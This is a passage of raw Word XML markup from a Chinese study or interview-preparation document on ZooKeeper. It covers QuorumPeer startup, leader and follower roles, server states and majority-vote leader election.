          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>QuorumPeer.start()</w:t>
      </w:r>
      <w:r w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>启动任务线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072197A" w:rsidRDefault="008F318F" w:rsidP="0072197A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="004C6765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Quo</w:t>
      </w:r>
      <w:r w:rsidR="004C6765" w:rsidRPr="00F7126A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rumPeer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C6765" w:rsidRPr="008D6295" w:rsidRDefault="00F7126A" w:rsidP="00895A50">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00F7126A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>zk</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7126A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的逻辑主线程，负责选举，投票等</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7126A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F70F1" w:rsidRPr="00F41A4C" w:rsidRDefault="009F70F1" w:rsidP="009F70F1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B5449A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面试回答</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5449A" w:rsidRDefault="00D44C30" w:rsidP="00D44C30">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ZK</w:t>
      </w:r>
      <w:r w:rsidR="00B5449A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00B5449A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>开源分布式应用协调服务</w:t>
      </w:r>
      <w:r w:rsidR="00B5449A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它可用于</w:t>
      </w:r>
      <w:r w:rsidR="00B5449A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>同步，配置管理，集群管理，</w:t>
      </w:r>
      <w:r w:rsidR="00B5449A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册中心，</w:t>
      </w:r>
      <w:r w:rsidR="00CA387C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据订阅发布</w:t>
      </w:r>
      <w:r w:rsidR="007D467E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00B5449A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001D7A0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zk</w:t>
      </w:r>
      <w:r w:rsidR="001D7A0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表现为分层的目录文件结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A13D3" w:rsidRPr="000A13D3" w:rsidRDefault="00D44C30" w:rsidP="007B007B">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ZK</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>自身组成一个集群</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2n+1</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个服务允许</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个失效</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务有两个角色，一个是</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，负责写服务和数据同步，剩下的是</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，提供读服务，</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>失效后会在</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中重新选举新的</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="000A13D3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14428" w:rsidRPr="00212C91" w:rsidRDefault="00C14428" w:rsidP="00C14428">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在工作过程中有三种状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14428" w:rsidRPr="00D44C30" w:rsidRDefault="00C14428" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LOOKING</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是谁，正在搜寻</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14428" w:rsidRPr="00D44C30" w:rsidRDefault="00C14428" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LEADING</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即为选举出来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14428" w:rsidRPr="00D44C30" w:rsidRDefault="00C14428" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FOLLOWING</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经选举出来，当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44C30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与之同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E274D" w:rsidRDefault="00861E62" w:rsidP="003E274D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E274D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当任何一个节点进入</w:t>
      </w:r>
      <w:r w:rsidR="003E274D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>looking</w:t>
      </w:r>
      <w:r w:rsidR="003E274D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态时，选举开始，进入</w:t>
      </w:r>
      <w:r w:rsidR="003E274D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>looking</w:t>
      </w:r>
      <w:r w:rsidR="003E274D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态有如下原因：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E274D" w:rsidRDefault="003E274D" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点刚启动，使自己进入选举状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E274D" w:rsidRDefault="003E274D" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点挂掉了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977864" w:rsidRDefault="003E274D" w:rsidP="009F2F61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00D44C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Leader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Follower</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PING</w:t>
      </w:r>
      <w:r w:rsidR="00E0752F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信</w:t>
      </w:r>
      <w:r w:rsidR="009F2F61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，了解对方是否存活。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977864" w:rsidRDefault="00977864" w:rsidP="009F2F61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC278D" w:rsidRPr="00977864" w:rsidRDefault="00E210E2" w:rsidP="009F2F61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00DC278D" w:rsidRPr="00977864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>选举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4A4B" w:rsidRDefault="00F8562E" w:rsidP="00B97189">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个节点要成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，必须得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>至少</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>n/2+1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（即半数以上节点）的投票</w:t>
      </w:r>
      <w:r w:rsidR="00EB4A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。选举算法确保一定要选出一个唯一的</w:t>
      </w:r>
      <w:r w:rsidR="00EB4A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EB4A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点。这有两层含义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4A4B" w:rsidRDefault="00EB4A4B" w:rsidP="00EB4A4B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CD38B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、一定要选出一个节点作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97189" w:rsidRDefault="00EB4A4B" w:rsidP="00B97189">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CD38B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00977864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一定要唯一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A00728" w:rsidRDefault="00B97189" w:rsidP="00B97189">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
